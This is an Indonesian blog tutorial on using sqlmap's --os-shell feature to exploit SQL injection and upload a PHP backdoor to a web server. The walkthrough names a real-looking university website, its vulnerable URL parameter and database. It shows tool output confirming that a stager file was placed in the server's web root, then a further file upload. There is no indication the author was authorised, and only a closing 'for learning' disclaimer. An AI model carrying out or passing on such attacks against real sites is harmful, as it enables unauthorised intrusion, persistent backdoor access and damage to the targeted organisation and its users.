Upload Shell dengan SQLMap


SQLMAP adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

Sangat sering kita menggunakan sqlmap untuk injeksi sql untuk mendapatkan database server web. Di artikel kali ini saya akan menunjukkan cara mengupload backdoor melalui SQLMAP.




  • Ketik command berikut untuk mengakses OS SHELL server web.

  • sqlmap -u http://alquran.unissula.ac.id/alquran/previewbukhari.php\?id\=21 -D quran --os-shell


    Sebelumnya saya sudah mendapatkan nama database web tersebut.





  • SQLMAP akan memberi anda pilihan, Bahasa apa yang disupport oleh web server tersebut. Kalian pilih nomor 4 (PHP) atau cukup tekan ENTER.



  • [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://alquran.unissula.ac.id:80/tmpujmew.php





  • SQLMAP sukses mengupload backdoor. Sekarang kita buka file yang telah diupload.


  • Perhatikan bagian bawah.




  • Kita coba upload file melalui file uploader dari SQLMAP.

  • Saya membuat file beranama bay.txt


  • Sekarang kita cek file yang sudah kita upload.



  • Semua artikel yang ada di blog.abaykan.com adalah untuk pembelajaran. Penggunaan sebagai tindakan yang melanggar hukum, diluar tanggung jawab kami. Sampai jumpa di artikel selanjutnya.
    Share:

    0 komentar:

    Posting Komentar